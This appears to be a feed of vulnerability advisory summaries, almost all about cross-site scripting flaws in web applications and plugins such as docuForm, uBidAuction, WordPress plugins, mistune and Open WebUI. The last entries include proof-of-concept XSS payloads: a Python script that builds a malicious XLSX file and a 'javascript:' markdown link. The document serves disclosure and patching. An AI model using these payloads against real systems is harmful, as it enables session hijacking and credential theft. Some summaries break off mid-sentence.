HireFlow v1.2 contains reflected cross-site scripting (XSS) vulnerabilities in the candidate detail interface that allow authenticated users to inject malicious scripts via the Resume or Feedback Comment fields when submitting data to POST /candidates/add or POST /feedback/add endpoints. An attacker with user-level access can craft a malicious request containing JavaScript payloads that execute in the browsers of other users viewing the affected pages, potentially compromising session tokens, stealing credentials, or performing actions on behalf of victims. The CVSS score of 5.4 reflects the requirement for user interaction and authenticated access, though the cross-site scope indicates broader application impact beyond the attacker's session.
Reflected XSS in docuForm Managed Print Services 11.11c enables authenticated attackers to execute malicious JavaScript in victim browsers via crafted links. The dfm-menu_orderopt.php component fails to sanitize input parameters, allowing session hijacking and account takeover when low-privilege users click attacker-controlled URLs. EPSS data unavailable; no CISA KEV listing indicates exploitation remains opportunistic rather than widespread. Public exploit code exists via GitHub Gist, lowering barrier to attack.
Reflected XSS in docuForm v11.11c allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious payloads into the dfm-menu_firmware.php component, requiring the victim to click a crafted link. CVSS 6.1 reflects moderate impact (confidentiality and integrity compromise) with required user interaction. Exploit code is publicly available via GitHub.
Reflected cross-site scripting in Mercury Managed Print Services docuForm v11.11c allows authenticated attackers with low privileges to execute arbitrary JavaScript in victim browsers via the acc-menu_pricess.php component. Public proof-of-concept exploit code exists on GitHub (ZeroBreach-GmbH). EPSS data not available, not listed in CISA KEV. Attack requires user interaction (phishing/social engineering to click malicious link), limiting automated exploitation but enabling credential theft and session hijacking for authenticated users.
docuFORM Managed Print Service Client 11.11c is vulnerable to a reflected cross site scripting attack via the login page of the application.
Reflected cross-site scripting (XSS) in GmbH Mercury docuForm v11.11c allows remote attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious payloads into an unfiltered variable in the dfm-menu_maintenance.php component. The vulnerability requires user interaction (clicking a crafted link) but affects all site visitors, making it suitable for credential theft, session hijacking, or malware delivery. No public active exploitation has been confirmed at time of analysis.
Reflected XSS in docuForm v11.11c allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by injecting malicious payloads into the acc-menu_papers.php component. The vulnerability requires user interaction (clicking a crafted link) and has limited scope (session-based impact), with a CVSS score of 6.1. No public exploit code availability or CISA KEV listing confirmed at time of analysis, though a reference repository exists.
Reflected cross-site scripting in Mercury docuForm (Managed Print Services) v11.11c enables authenticated attackers to execute arbitrary JavaScript in victim browsers when users click malicious links. The vulnerability exists in dfm-menu_markeralerts.php due to unfiltered variable handling. CVSS 7.3 (High) reflects network-accessible attack requiring low-privilege authentication and user interaction. No public exploit confirmed, but proof-of-concept code published by ZeroBreach GmbH demonstrates feasibility. EPSS data unavailable; not in CISA KEV, indicating no confirmed widespread exploitation at time of analysis.
Cross Site Scripting vulnerability in iotgateway v.3.0.1 allows a remote attacker to execute arbitrary code via the Log Record Function
Stored cross-site scripting (XSS) in Devs Palace ERP Online up to version 4.0.0 allows high-privileged users to inject malicious scripts via the /inventory/purchase_save endpoint, affecting the confidentiality of other users' sessions. The vulnerability requires administrative-level privileges and user interaction (UI:R), resulting in a low CVSS score of 2.4, though publicly available exploit code exists and the vendor has not responded to disclosure attempts.
WordPress Picture Gallery 1.4.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the Edit Content URL field in the Access. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Advanced Guestbook 2.4.4 contains a persistent cross-site scripting vulnerability in the smilies administration interface that allows authenticated attackers to inject malicious scripts by. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress GetPaid Plugin 2.4.6 contains an HTML injection vulnerability that allows authenticated attackers to inject arbitrary HTML code by exploiting the Help Text field in payment forms. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Projectsend r1295 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting crafted input in the 'name' parameter of. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Exponent CMS 2.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the Title and Text Block parameters in the text editing. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Filterable Portfolio Gallery 1.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by entering payloads in the title field. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin WP Symposium Pro 2021.10 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by exploiting insufficient sanitization. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Contact Form to Email 1.3.24 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by creating forms with script tags in the form name. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
CMDBuild 3.3.2 contains multiple stored cross-site scripting vulnerabilities that allow authenticated attackers to inject arbitrary web script or HTML via crafted input in card creation and file. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Ultimate Product Catalog 5.8.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the price parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Slider by Soliloquy 2.6.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through the title parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
AccessPress Social Icons 1.8.2 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by entering JavaScript payloads into the 'icon. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Rocket LMS 1.1 contains a persistent cross-site scripting vulnerability in the support ticket module that allows authenticated users to inject malicious script code through the title parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin AAWP 3.16 contains a reflected cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by manipulating the tab parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the backend/mailingLog/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the tickets/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the news/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the posts/manage module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/myAuctions/status/loose module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the auctions/myAuctions/status/active module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the orders/myOrders module. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin IP2Location Country Blocker 2.26.7 contains a stored cross-site scripting vulnerability that allows authenticated users to inject arbitrary JavaScript code through the Frontend. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress International Sms For Contact Form 7 Integration version 1.2 contains a reflected cross-site scripting vulnerability in the page parameter of the admin settings interface. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Contact Form Builder 1.6.1 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by exploiting the form_id parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin Jetpack 9.1 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the post_id parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Drupal avatar_uploader 7.x-1.0-beta8 contains a reflected cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by manipulating the file parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin Videos sync PDF 1.7.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by exploiting unsanitized nom, pdf, mp4,. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Motopress Hotel Booking Lite 4.2.4 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by submitting payloads in accommodation type. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin Testimonial Slider and Showcase 2.2.6 contains a stored cross-site scripting vulnerability that allows authenticated editors to inject malicious scripts by failing to sanitize the. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress Plugin Netroics Blog Posts Grid 1.0 contains a stored cross-site scripting vulnerability that allows authenticated editors to inject malicious scripts by failing to sanitize the post_title. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
WordPress 3dady real-time web stats plugin 1.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious JavaScript by exploiting unsanitized input. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.
Moodle LMS 4.0 contains a cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting payloads through the search parameter. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Cross-site scripting (XSS) in Devs Palace ERP Online through version 4.0.0 allows high-privileged authenticated users to inject malicious scripts via the /inventory/item-save endpoint, requiring user interaction (UI:P) for exploitation. Public exploit code is available, and the vendor has not responded to early disclosure notification, leaving affected deployments without an official patch and at risk of account compromise or session hijacking by attackers with high administrative privileges.
Reflected cross-site scripting in Devs Palace ERP Online up to version 4.0.0 allows authenticated high-privilege users to inject malicious scripts via the /inventory/customer-save endpoint, requiring user interaction to execute. Despite public exploit availability and early vendor notification, no patch or vendor response has been documented. CVSS score of 1.9 reflects high authentication requirements and limited impact scope, though the presence of public exploit code indicates practical demonstration of the vulnerability.
Stored cross-site scripting (XSS) in Devs Palace ERP Online up to version 4.0.0 allows high-privileged authenticated users to inject malicious scripts via the /inventory/supplier-save endpoint, affecting data integrity and confidentiality of other users viewing the supplier data. The vulnerability requires user interaction (UI:P) and high-level privileges (PR:H), limiting its exploitation scope; however, publicly available exploit code exists and the vendor has not responded to disclosure.
Cross-site scripting (XSS) vulnerability in Devs Palace ERP Online up to version 4.0.0 allows authenticated high-privilege users to inject malicious scripts via the /inventory/purchase_return_save endpoint. The vulnerability requires user interaction (UI:P) to trigger, and publicly available exploit code exists. The vendor has not responded to disclosure attempts, leaving affected installations without official guidance or patches.
Stored cross-site scripting (XSS) in JeecgBoot up to version 3.9.1 allows remote attackers to inject malicious scripts via SVG file handling in the CommonController component, requiring user interaction to trigger payload execution. The vulnerability has publicly available exploit code and affects the system's integrity through stored script injection, with a CVSS score of 2.1 reflecting low severity due to user interaction requirement and limited impact scope.
Cross-site scripting (XSS) in mistune's HTMLRenderer.heading() allows injection of arbitrary HTML attributes when custom heading_id callbacks return unsanitized heading text. The vulnerability occurs because the id attribute value is concatenated directly into the HTML tag without escaping, enabling attackers who control heading content to break out of the id= attribute and inject event handlers or other malicious attributes. Exploitation requires a caller-supplied heading_id callback that derives IDs from heading text - the most common real-world pattern used by documentation generators like MkDocs, Sphinx, and Jekyll. Publicly available proof-of-concept demonstrates mouse-over triggered JavaScript execution via onmouseover attribute injection.
Cross-site scripting (XSS) via unescaped HTML attributes in mistune's figure directive allows attackers to inject arbitrary HTML and JavaScript when processing markdown documents with figure directives, bypassing the HTMLRenderer escape setting. The `figclass` and `figwidth` parameters in `render_figure()` are concatenated directly into HTML without sanitization, while other attributes in the same file are properly escaped. Vulnerability affects mistune versions through 3.2.0; no patched version is currently released.
Cross-site scripting (XSS) vulnerability in the Mistune markdown parser's math plugin bypasses the `escape=True` security setting by rendering inline (`$...$`) and block (`$$...$$`) math content without HTML escaping. Attackers can inject arbitrary JavaScript that executes in the victim's browser session when a developer-controlled application parses untrusted markdown with the math plugin enabled, even when the parser is explicitly configured to sanitize all user input. Proof-of-concept code demonstrates script tag injection and image onerror handler exploitation; no public exploit code identified at time of analysis.
Stored cross-site scripting in Linkwarden 2.14.0 and earlier allows remote unauthenticated attackers to execute arbitrary JavaScript in victims' authenticated sessions by uploading malicious HTML archives. The vulnerability exists because the /api/v1/archives endpoint accepts unsanitized HTML files and serves them without Content-Security-Policy protections, enabling session hijacking and account takeover. No vendor-released patch identified at time of analysis (GHSA advisory notes no patches available). EPSS data not provided; no active exploitation (CISA KEV) or public POC identified at time of analysis.
Grimmory is a self-hosted digital library. Prior to version 2.3.1, a stored cross-site scripting (XSS) vulnerability in Grimmory's browser-based EPUB reader allows an attacker to embed arbitrary JavaScript in a crafted EPUB file. When a victim opens the book, the script executes in their browser with full access to the Grimmory application's session context. This can enable session token theft and account takeover, including administrative access if an administrator opens the affected book. This issue has been patched in version 2.3.1.
Postiz is an AI social media scheduling tool. From version 2.21.6 to before version 2.21.7, any authenticated user who can create a post can store arbitrary HTML in post content by tampering their own save request and send the public preview link /p/<postId>?share=true to another user. The preview page renders that stored HTML with dangerouslySetInnerHTML on the main application origin. This issue has been patched in version 2.21.7.
### Summary Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the [sheetjs](https://git.sheetjs.com/sheetjs/sheetjs) function [sheet_to_html](https://git.sheetjs.com/sheetjs/sheetjs/src/commit/66cf8d2117d271f89e4f47b5fed35a3e1ea93f67/bits/79_html.js#L127) to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via [`@html`](https://svelte.dev/docs/svelte/@html) causing the payload to trigger. ### Details The function used to convert XLSX documents to HTML for preview does not perform any input validation or sanitisation for the generated HTML https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L120-L133 XLSX attachments are processed by this function, converted to HTML with `XLSX.utils.sheet_to_html` before ultimately being assigned to the variable `excelHtml`. Later there is logic that causes this to be assigned directly to the DOM when the preview tab is selected. https://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L358-L400 ### PoC A python script to generate a payload file is as follows: ```python import xlsxwriter payload = '<img src=x onerror="alert(\'XSS Triggered by XLSX file\')">' workbook = xlsxwriter.Workbook('xss_payload.xlsx') worksheet = workbook.add_worksheet() payload_format = workbook.add_format() worksheet.write_rich_string('A1', 'This cell contains a hidden payload: ', payload_format, payload ) worksheet.write('A2', 'This is a safe cell.') worksheet.write('B1', 'Column B') workbook.close() ``` Upload the generated file as an attachment to a chat, open the file modal, and click preview. Observe the XSS triggers. <img width="2444" height="1386" alt="image" src="https://github.com/user-attachments/assets/8400efb0-ea6f-4878-abdb-4c2fe529241f" /> This same process can be triggered in shared chats, allowing the payload to be distributed to victims. <img width="2386" height="1646" alt="image" src="https://github.com/user-attachments/assets/d0eda49c-8fcf-4fc4-bbb0-c8951b0369c3" /> ### Impact Any user can create a weaponised chat that can be shared and subsequently used to target other users. Low privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server. Admins are at risk of exposing the server to RCE via same chain described in GHSA-w7xj-8fx7-wfch. ### Caveats The file attachment in the shared chat must be opened and previewed to trigger the vulnerability. ### Recommendation Sanitise the generated HTML with DOMPurify before assigning it to the DOM.
### Impact Users with component view access could be impacted by an unescaped `notes` column. ### Patches This was patched in https://github.com/grokability/snipe-it/commit/28f493d84d057895fbb93b6570e7393a2c2fa438, and is fixed in v8.4.1 or greater. ### Workarounds None.
## Vulnerability Details **CWE-79**: Cross-site Scripting (XSS) The `AccountPending.svelte` component renders the admin-configured "Pending User Overlay Content" using `marked.parse()` inside `{@html}` with an incorrect DOMPurify application order: ### Vulnerable Code **`src/lib/components/layout/Overlay/AccountPending.svelte` (lines 43-48)**: ```svelte {@html marked.parse( DOMPurify.sanitize( ($config?.ui?.pending_user_overlay_content ?? '').replace(/\n/g, '<br>') ) )} ``` DOMPurify is applied to the raw Markdown input **before** `marked.parse()` processes it. This is the wrong order. DOMPurify sanitizes the Markdown text (which contains no HTML tags), then `marked.parse()` converts Markdown link syntax into HTML `<a>` tags with `javascript:` href, and the result is rendered with `{@html}` unsanitized. The correct pattern (used elsewhere in the codebase, e.g., `NotebookView.svelte:77`) is: ```javascript DOMPurify.sanitize(marked.parse(src)) // sanitize AFTER markdown parsing ``` ## Steps to Reproduce ### Prerequisites - Open WebUI v0.8.10 - Admin account - A second user account with "pending" role ### Steps 1. Log in as admin and navigate to **Admin Settings** → **Settings** → **General**. 2. Set **Default User Role** to `pending`. 3. In the **Pending User Overlay Content** field, enter: ``` # Account Pending Your account is under review. [Contact Support](javascript:alert(document.domain)) ``` 4. Save the settings. 5. In a separate browser (or incognito window), create a new account or log in as a pending user. 6. The pending overlay is displayed. Click the "Contact Support" link. 7. A JavaScript alert dialog appears showing `localhost` (the document domain), confirming XSS execution. ### Verified Output The `alert(document.domain)` executes successfully, displaying "localhost" in a JavaScript dialog box. ## Impact An admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This could be used to: - **Session hijacking**: Steal pending users' JWT tokens from cookies/localStorage - **Credential theft**: Replace the pending overlay with a fake login form - **Phishing**: Redirect pending users to malicious sites While this requires admin privileges to set the overlay content, it enables an admin to attack pending users (who have not yet been granted full access). In multi-admin deployments, a compromised admin account could use this to escalate attacks. ## Proposed Fix Apply DOMPurify **after** `marked.parse()`, not before: ```svelte <!-- Before (vulnerable): --> {@html marked.parse( DOMPurify.sanitize( ($config?.ui?.pending_user_overlay_content ?? '').replace(/\n/g, '<br>') ) )} <!-- After (fixed): --> {@html DOMPurify.sanitize( marked.parse( ($config?.ui?.pending_user_overlay_content ?? '').replace(/\n/g, '<br>'), { async: false } ) )} ``` <img width="1510" height="1093" alt="2026-03-23_03-07" src="https://github.com/user-attachments/assets/bcc94dd6-4f06-472b-9979-9759458c76b3" />